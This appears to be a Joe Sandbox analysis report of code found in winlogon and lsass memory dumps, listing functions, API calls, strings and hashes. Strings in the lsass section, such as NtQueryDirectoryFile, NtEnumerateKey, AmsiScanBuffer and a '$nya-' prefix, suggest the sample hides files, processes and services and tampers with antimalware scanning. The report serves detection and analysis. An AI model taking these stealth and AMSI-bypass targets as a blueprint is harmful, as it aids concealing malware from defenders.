Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction ID: 517ae6d43ddc074c8658f2a788c9059df09fd0698180bc9205b6b9a099bd701b
Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction Fuzzy Hash: 34116033614B4482EB228F15F40469977E5FB88B98FA88224EE8D07754DF3EC552CB81

Function 000001CA7D1E9178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000001CA7D1E91C8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,000001CA7D1E87F7), ref: 000001CA7D1E9209

Strings

csm, xrefs: 000001CA7D1E91F6

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction ID: 2c9b86ec9324a70017c97faafd6a1d8197db821130e30e04182a7cd2d4a5eeb9
Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction Fuzzy Hash: 4E116D73615B8482FB228F15F404689B7E1FB88B98F984220EE8D47B64DF3DC551CB42

Function 000001CA7D291D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001CA7D291D69
HeapAlloc.KERNEL32 ref: 000001CA7D291D77
GetProcessHeap.KERNEL32 ref: 000001CA7D291D9C
HeapFree.KERNEL32 ref: 000001CA7D291DAA

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction ID: 6f79bdca26009a9ee4067a207548d913ca885e6906045b0f798edfce7c91817a
Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction Fuzzy Hash: B311A132F41B8885FA16CB67A40459A77A0FBC8FC5F984028DE4E57724DF3AC4438382

Function 000001CA7D211D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001CA7D211D69
HeapAlloc.KERNEL32 ref: 000001CA7D211D77
GetProcessHeap.KERNEL32 ref: 000001CA7D211D9C
HeapFree.KERNEL32 ref: 000001CA7D211DAA

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction ID: 94fdc9e09a08f213f1bc6ccc5a98238e785e2224b4f0dd50957134c3d91f74e5
Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction Fuzzy Hash: A011A132F01B8881FA16CB66A40959977A0FBC9FD4F998128DE4E53724DF3AD4438386

Function 000001CA7D1E1D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001CA7D1E1D69
HeapAlloc.KERNEL32 ref: 000001CA7D1E1D77
GetProcessHeap.KERNEL32 ref: 000001CA7D1E1D9C
HeapFree.KERNEL32 ref: 000001CA7D1E1DAA

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction ID: e1af4d63e573468e5d58cd1c053f447371db77335f721c67b8fdd4aa0972600e
Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction Fuzzy Hash: 3D11A132E05B8881FB16CB66E40899977B0FB88FC5F994024DE4E53764DF39D5828341

Function 000001CA7D291264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001CA7D29126A
HeapAlloc.KERNEL32 ref: 000001CA7D291279
GetProcessHeap.KERNEL32 ref: 000001CA7D291293
HeapAlloc.KERNEL32 ref: 000001CA7D2912A4

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction ID: 32f83ff9894d743aa2ecb00ca60260912a8aebc8456aa75ed97ca70b7629fe4d
Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction Fuzzy Hash: A1E03032A416089AF7158B52D80879A36E1FBC8B09F848014CD090B350DF7EC49A87C2

Function 000001CA7D211264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001CA7D21126A
HeapAlloc.KERNEL32 ref: 000001CA7D211279
GetProcessHeap.KERNEL32 ref: 000001CA7D211293
HeapAlloc.KERNEL32 ref: 000001CA7D2112A4

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction ID: 839ec4f0ffbd96bf49ac46d9521be995a92d04ba0fb748254b619ef769a1f32e
Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction Fuzzy Hash: 0CE03932A416089AF7158B62D80979936E1FB88B19FC6C024C90907350EF7ED49A87C2

Function 000001CA7D1E1264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001CA7D1E126A
HeapAlloc.KERNEL32 ref: 000001CA7D1E1279
GetProcessHeap.KERNEL32 ref: 000001CA7D1E1293
HeapAlloc.KERNEL32 ref: 000001CA7D1E12A4

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction ID: 8e9949c7d491d186b10d6f9a7e37656757b2784cb481f8207ee02abd3ddac45a
Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction Fuzzy Hash: C8E06572A427089AF715CF52D81878936E1FF88F0AF85C014C90907350DF7ED5998782

Function 000001CA7D291000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001CA7D291006
HeapAlloc.KERNEL32 ref: 000001CA7D291015
GetProcessHeap.KERNEL32 ref: 000001CA7D291028
HeapAlloc.KERNEL32 ref: 000001CA7D291037

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction ID: b65b3539fbd709d3eb2ea5f55c358f6cc5828dd715b3526b499a0208b2522084
Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction Fuzzy Hash: F4E0ED72A51608AAF7199B62D8046AA76A1FFC8B19F848024CD090B310EE3D849A9792

Function 000001CA7D211000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001CA7D211006
HeapAlloc.KERNEL32 ref: 000001CA7D211015
GetProcessHeap.KERNEL32 ref: 000001CA7D211028
HeapAlloc.KERNEL32 ref: 000001CA7D211037

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction ID: 4bb58136d852c2a653d8a036cd639210b1baa135ea19a913abf8e9fecaf76bee
Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction Fuzzy Hash: BCE06D72A516089AF7198B22D80969832A1FF88B19FC5C020C90907310EE3D949A9692

Function 000001CA7D1E1000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001CA7D1E1006
HeapAlloc.KERNEL32 ref: 000001CA7D1E1015
GetProcessHeap.KERNEL32 ref: 000001CA7D1E1028
HeapAlloc.KERNEL32 ref: 000001CA7D1E1037

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction ID: 44117e496ed412bfeff2ee36783a986e767d656568b4863f217f146fa26acdf1
Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction Fuzzy Hash: 69E092B2A526089BF719CF22DC1478836E1FF8CF0AF858020C90907350EE3DD598D752

Analysis Process: lsass.exePID: 632, Parent PID: 6140COMMON

Execution Graph

Execution Coverage:	1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	174
Total number of Limit Nodes:	13

Executed Functions

Function 0000017D2DD527E8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryDirectoryFileEx.NTDLL ref: 0000017D2DD52861
GetFileType.KERNEL32 ref: 0000017D2DD528CC
StrCpyW.SHLWAPI ref: 0000017D2DD528E5

Part of subcall function 0000017D2DD53F88: StrCmpNIW.SHLWAPI(?,?,?,0000017D2DD5272F), ref: 0000017D2DD53FA0

Strings

\\.\pipe\, xrefs: 0000017D2DD528D7

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: File$DirectoryQueryType
String ID: \\.\pipe\
API String ID: 4175507832-91387939
Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction ID: 13d1426295f582f1fef4479a0643aac2144f9f87ebd461d2444b396535ed9581
Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction Fuzzy Hash: FB71D736208F8A52E734DF26B8443EA6BB4FB857C4F484016DD4D43B8ADEB5C68AC740

Function 0000017D2DD52300 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 162
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQuerySystemInformation.NTDLL ref: 0000017D2DD5232B
StrCmpNIW.SHLWAPI ref: 0000017D2DD5239A

Part of subcall function 0000017D2DD535C8: GetProcessHeap.KERNEL32(?,?,?,?,?,0000017D2DD524D1), ref: 0000017D2DD535EB
Part of subcall function 0000017D2DD535C8: HeapAlloc.KERNEL32(?,?,?,?,?,0000017D2DD524D1), ref: 0000017D2DD535FE
Part of subcall function 0000017D2DD535C8: StrCmpNIW.SHLWAPI(?,?,?,?,?,0000017D2DD524D1), ref: 0000017D2DD53673
Part of subcall function 0000017D2DD535C8: GetProcessHeap.KERNEL32(?,?,?,?,?,0000017D2DD524D1), ref: 0000017D2DD536D9
Part of subcall function 0000017D2DD535C8: HeapFree.KERNEL32(?,?,?,?,?,0000017D2DD524D1), ref: 0000017D2DD536E7

Strings

$nya-, xrefs: 0000017D2DD52393
S, xrefs: 0000017D2DD524BB

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocFreeInformationQuerySystem
String ID: $nya-$S
API String ID: 722747020-3492252248
Opcode ID: 4ac77b2c6d0e63e88a47bc1c42b4b05fc6ca31a13af142bc6dc0eee490c53e66
Instruction ID: 850f05bd11e511c281c5463248047073372b965f77c52c85919e52c47a673e3b
Opcode Fuzzy Hash: 4ac77b2c6d0e63e88a47bc1c42b4b05fc6ca31a13af142bc6dc0eee490c53e66
Instruction Fuzzy Hash: ED519032A18F6886F760CB65A4807ED6BB8FB65788F08C415DE4D56B46DBB9C8C6C340

Function 0000017D2DD51E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 0000017D2DD51E7F

Part of subcall function 0000017D2DD522A8: GetModuleHandleA.KERNEL32(?,?,?,0000017D2DD51EB1), ref: 0000017D2DD522C0
Part of subcall function 0000017D2DD522A8: GetProcAddress.KERNEL32(?,?,?,0000017D2DD51EB1), ref: 0000017D2DD522D1

CreateThread.KERNELBASE ref: 0000017D2DD52043
TlsAlloc.KERNEL32 ref: 0000017D2DD52049
TlsAlloc.KERNEL32 ref: 0000017D2DD52055
TlsAlloc.KERNEL32 ref: 0000017D2DD52061
TlsAlloc.KERNEL32 ref: 0000017D2DD5206D
TlsAlloc.KERNEL32 ref: 0000017D2DD52079
TlsAlloc.KERNEL32 ref: 0000017D2DD52085

Strings

pdh.dll, xrefs: 0000017D2DD51FD7, 0000017D2DD51FF8
sechost.dll, xrefs: 0000017D2DD51F99
amsi.dll, xrefs: 0000017D2DD52019
PdhGetRawCounterArrayW, xrefs: 0000017D2DD51FD0
EnumServicesStatusExW, xrefs: 0000017D2DD51F71, 0000017D2DD51F92
NtEnumerateKey, xrefs: 0000017D2DD51F19
NtQueryDirectoryFileEx, xrefs: 0000017D2DD51EFC
PdhGetFormattedCounterArrayW, xrefs: 0000017D2DD51FF1
ntdll.dll, xrefs: 0000017D2DD51E8D
advapi32.dll, xrefs: 0000017D2DD51F57, 0000017D2DD51F78
NtResumeThread, xrefs: 0000017D2DD51EC2
AmsiScanBuffer, xrefs: 0000017D2DD52012
NtQueryDirectoryFile, xrefs: 0000017D2DD51EDF
NtEnumerateValueKey, xrefs: 0000017D2DD51F36
EnumServiceGroupW, xrefs: 0000017D2DD51F50
NtQuerySystemInformation, xrefs: 0000017D2DD51EA5
NtDeviceIoControlFile, xrefs: 0000017D2DD51FB6

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: 96f4f97e7589e417bfd216c0fa725ebf6ad4169998ba69a4a526b571fa602114
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: AC5148B4518F8EA5FA00EBA9FC51BD46B30AF40744F889A53940D0656BDEB882DFC780

Function 0000017D2DD51AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFinalPathNameByHandleW.KERNELBASE ref: 0000017D2DD51AF4
StrCmpNIW.KERNELBASE ref: 0000017D2DD51B0E
lstrlenW.KERNEL32 ref: 0000017D2DD51B1D
StrCpyW.SHLWAPI ref: 0000017D2DD51B32

Strings

\\?\, xrefs: 0000017D2DD51B02

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction ID: 682f90f5b637f35a2c3d5446783d20b17b34457fb52783b3e1abf76f5c572ba5
Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction Fuzzy Hash: 38F04F72308B8992EB208F25F9843997371FB45BC8F884021DB4D4695ADE6CC6CACB80

Function 0000017D2DD51E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 0000017D2DD51E47
GetProcAddress.KERNEL32 ref: 0000017D2DD51E57
SleepEx.KERNELBASE ref: 0000017D2DD51E67

Strings

AmsiScanBuffer, xrefs: 0000017D2DD51E50
amsi.dll, xrefs: 0000017D2DD51E40

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: e07f860e85c6e67f3043271f4cb48da2854f5ab70fe7cc9399e9ad5156588ed3
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: 0CD09E30659F48D5FA086F55FC543D43271BFA4B41FCC4415C60E012A6DE6C85DB83C0

Function 0000017D2DD53A1C Relevance: 4.5, APIs: 3, Instructions: 39
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 0000017D2DD53A35
